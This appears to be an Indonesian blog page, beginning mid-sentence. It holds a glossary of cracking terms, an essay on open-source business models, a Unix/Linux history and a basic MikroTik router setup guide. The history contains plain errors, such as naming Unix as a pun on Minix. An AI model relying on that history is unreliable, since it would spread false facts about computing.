penting dengan cara menjelajah, lebih sering di sebut sebagai cracker.

Crack
1.memaksa masuk kedalam suatu sistem
2.kegiatan menghilangkan copy protection
3.Program, instruksi yang digunakan untuk menghilangkan copy protection

Cracker
1.seseorang yang mencoba masuk kedalam suatu jaringan secara paksa dengan
tujuan mengambil keuntungan, merusak, dsb.
2.seseorang yang menghilangkan copy protection
3.seseorang yang melakukan kegiatan "crack"

Cracking
1.kegiatan membobol suatu sistem komputer dengan tujuan menggambil
keuntungan merusak dan menghancurkan dengan motivasi tertentu.

*ezine

Open Source

Open Source adalah sebuah sistem baru dalam mendistribusikan software kepada
pengguna dengan memberikan program dan source code nya secara gratis! Bahkan
pengguna dapat mempelajari dan melakukan modifikasi untuk membuat software
tersebut sesuai dengan kebutuhan mereka.

Richard M. Stallman,pendiri Free Software Foundation -sebuah organisasi yang
mendukung Open Source,mengeluarkan sebuah lisensi software untuk Open Source
yang dinamakan GPL (GNU Public License). Lisensi inilah yang saat ini paling
banyak digunakan untuk mendistribusikan software Open Source. Selain GPL,
masih banyak lisensi software lainnya yang dikembangkan oleh komunitas Open
Source.

Berikut adalah keuntungan software Open Source:
Sisi pengguna:
* Gratis
* Pengguna dapat terlibat dalam pengembangan program karena memiliki
* source code nya
* Respon yang baik dari pemakai sehingga bug dapat ditemukan dan
* diperbaiki dengan lebih cepat.

Sisi developer:
* Seluruh komunitas mau dan dapat membantu untuk membuat software anda
* menjadi lebih baik
* Tidak ada biaya iklan dan perawatan program
* Sebagai sarana untuk memperkenalkan konsep anda

Linux adalah sebuah contoh yang bagus. Banyak sistem operasi yang berusaha
meniru kisah sukses Linux, tetapi Linux tetap yang paling sukses hingga
saat ini. Aspek positif dari Open Source adalah penerimaan yang luas untuk
software yang benar-benar bagus. Tetapi keuntungan tersebut tidak cukup,
terutama untuk orang yang memang bekerja dengan membuat program
programmer), mereka membutuhkan uang untuk melanjutkan pengembangan
software mereka (dan untuk makan tentunya).

mungkin beberapa dari pembaca berpikir, ini gila, jika kita membagi-bagikan
software kita dengan gratis, bagaimana kita dapat bertahan? Bagaimana kita
dapat menghasilkan uang?Tapi tunggu,ada beberapa cara yang dapat digunakan
untuk menghasilkan uang dari ekonomi Open Source ini. Tapi penting untuk
diketahui bahwa hanya software yang memang bagus yang dapat bertahan dan
menghasilkan uang, program yang jelek tidak dapat bertahan (kecuali anda
memaksa orang-orang untuk membelinya!).Berikut adalah beberapa diantaranya:
* Jual program dan source code dan manual book dalam sebuah box, program
* tersebut gratis jika pengguna mau mendownloadnya sendiri, tetapi
* pengguna harus membayar untuk mendapatkan produk komersialnya.
* Jual program tambahan yang memanfaatkan teknik tingkat tinggi program
* Open Source anda.
* Jual dukungan teknis untuk membantu pengguna menggunakan produk
* tersebut.
* Jual jasa untuk customize program sesuai dengan kebutuhan pengguna.
* Sisipan iklan pada software.
* Mencari sponsorship dari perusahaan yang berhubungan dengan software
* yang dibuat.

Itu adalah sebagian kecil contoh tentang bagaimana menghasilkan uang dari
software Open Source, seperti yang dapat anda bayangkan,Open Source tidak
hanya menguntungkan pengguna, tetapi juga menguntungkan bagi developer.
Saya rasa ini adalah solusi win-win. Jadi bagaimana pendapat anda?

Sejarah Linux

kelahiran linux dimulai pada akhir tahun 1960 pada sebuah perusahaan T&T(American telephone and Telegraph). Saat itu, AT & T yang bekerjasama dengan MIT (Massachusetts Institute of Technology), bekerja dengan menggunakan operating system bernama "multics". Multics memiliki banyak sekali masalah, masalah terbesarnya adalah mahalnya biaya yang dikeluarkan untuk menjalankannya pada General Electric Mainframe ( GE 645). Perkembangan selanjutnya pun menjadi tidak memuaskan.

Bagaimanapun juga penggunaan Multics tetap dipertahankan karena menawarkan kemampuan multiuser (penggunaan bersama). Para Programer harus bekerja bersama-sama dan saling bertukar informasi dengan mudah, dan mereka sangat ingin untuk dapat lepas dari masalah biaya yang besar. Seiring dengan perkembangan dan keuangan yang membaik, grup tersebut berusaha mencari pengganti yang sesuai untuk multics.

Ken thompson, salah seorang anggota grup AT&T, mulai merancang sebuah game bernama"Space travel", sayangnya game ini juga menghabiskan biaya yang mahal untuk dapat dimainkan. Saat Thompson menemukan sebuah komputer digital PDP-7, bersama teman kuliahnya Dennis Ritchie, mereka menulis ulang game tersebut dalam assembler dan memindahkannya dengan menggunakan paper tape.

Dalam perkembangan memindahkan game tersebut mereka telah meletakkan "command interpreter" dan sejumlah perintah dasar untuk mengkopi dan memindahkan file-file.

Awal tahun 1970, Brian Kerningham, seorang pengembang lainnya dari AT&T mengusulkan nama "Unix" sebagai pelesetan dari Minix (peralatan untuk mengajarkan pemrograman). Dimulailah sebuah cikal bakal sebuah operating system bernama "Unix". Team pengembang Unix meminta komputer PDP-11 kepada manajemen AT&T, mesin yang lebih tangguh dari PDP-7,tetapi lebih murah dari semua biaya yang harus mereka keluarkan sebelumnya.

Unix yang seluruh source codenya dibuat dengan bahasa C sangat memudahkan pengembanganya sehingga dalam waktu singkat Unix dapat berkembang secara pesat, dan terbentuklah dua aliran : yaitu Unix yang dikembangkan oleh Universitas Berkeley dan yang dikembangkan AT&T.

Semakin lama semakin banyak perusahaan yang ikut melibatkan diri, sehingga terjadilah persaingan antar perusahaan untuk memegang kontrol terhadap sistem operasi. Persaingan ini menyebabkan perlunya sebuah standar yang baku sehingga lahirlah proyek bernama 'POSIX' yang di motori oleh IEEE (The Institute of Electrical and Electronics Engineers) yang akan menetapkan spesifikasi standar Unix. ternyata, dengan adanya standar tersebut tetap belum bisa meredakan persaingan yang timbul yang mengakibatkan munculnya berbagai varian dari Unix.

Source code Minix yang tercipta sebagai salah satu varian Unix dan dibuat oleh Andy S Tanembaum untuk tujuan pendidikan inilah yang dijadikan Linus Torvalds sebagai referensi untuk membuat suatu Opeating System yang dapat bekerja seperti Unix dalam komputer 386. Dalam pembuatan linux , Linus memakai tool-tool dari Free Software Foundation yang berlicensi GNU. Agar sistem operasi yang baru dibuatnya utuh , linus juga menambahkan program-program yang berlicensi GNU. Linux yang dibuat linus sebagai hobi akhirnya membuahkan versi pertama linux, yaitu linux versi 0.0.1, setelah mengalami perbaikan pada versi 0.02 dan merupakan linux resmi pertama yang diumumkan secara luas kepada publik. pada tanggal 5 Oktober 1991 linus menggumumkan source codenya.

Linux yang pertama dirilis sudahdapat menjalankan shell bash,GNU C compiler, GNU make, GNU Sed, Compress dll. Proyek linux ini menyita begitu banyak perhatian seluruh programer di dunia yang akhirnya berpartisipasi untuk ikut mengembangkan linux.

'Linux' bisa jadi merupakan proyek para hacker yang sangat berharga didalam sejarah - serta didistribusikan secara bebas beserta kode sumbernya keseluruh dunia.

*ezine

Kamis, 25 Juni 2009

Cara Cepat Setting Mikrotik

Saya anggap instalasi Mikrotik sudah selesai

1. User Login Mikrotik Standar : admin Password Standar : (empty)

2. Setting IP eth1 (IP dari ISP)
perintah:
ip addrees 192.168.xxx.xxx netmask 255.255.255.xxx interface ether1

3. Setting IP eth2 (IP dari local)
perintah:
ip addrees 192.168.xxx.xxx netmask 255.255.255.xxx interface ether2

4. setelah melakukan perintah ini seharusnya komputer anda sudah konek ke server mikrotik, silahkan test dengan perintah "ping" jika belum cek lan card anda dan ulangi perintah diatas

5. Setting Gateway (IP dari ISP atau IP modem anda)
perintah:
ip route add gateway 192.168.xxx.xxx

6. Setting Primary DNS (IP dari ISP)
perintah:
ip dns set primary-dns=202.152.xxx.xxx

7. Setting Secondary DNS (IP dari ISP)
perintah:
ip dns set secondary-dns=202.152.xxx.xxx

8. Setting routing masquerade ke eth1
perintah:
ip firewall nat add chain=srcnat action=masquerade out-interfaces=ether1
Test ping ke gateway bila sudah connect berati server mikrotik anda sudah siap digunakan